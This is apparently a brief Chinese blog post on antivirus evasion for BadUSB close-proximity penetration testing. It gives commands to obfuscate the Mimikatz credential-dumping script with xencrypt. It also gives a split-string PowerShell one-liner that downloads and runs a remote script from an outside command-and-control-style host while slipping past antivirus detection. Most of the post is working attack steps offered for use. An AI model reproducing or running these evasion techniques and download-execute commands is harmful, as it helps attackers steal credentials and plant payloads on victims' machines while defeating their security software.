关于近源渗透测试的免杀

近源渗透测试badusb执行代码的免杀

在进行近源渗透测试的时候,我们发现国内杀软对powershell的管制非常的严格,只要有后台隐藏执行的powershell都会触发可疑行为警报,但是这不代表不能绕过。
powershell.png

生成powershell payload

如图生成payload,我们使用powershell的payload,就不用勾选64位了
TIM图片20200415192803.png

powershell混淆

接下来做混淆,否则ps脚本下载下来也是被杀软秒杀的,可以使用InvokeObfuscation或者xencrypt。
我这里使用的是xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68

可以选择免杀68次
https://github.com/the-xentropy/xencrypt

badusb运行脚本拆分免杀

由于免杀后的脚本会很大,所以我们可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")从服务器下载ps脚本运行,但是会被杀软杀,所以可以用拆分免杀。

powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""
posted @ 2020-06-16 10:48  楼下的小可怜-w0x68y  阅读(768)  评论(0编辑  收藏  举报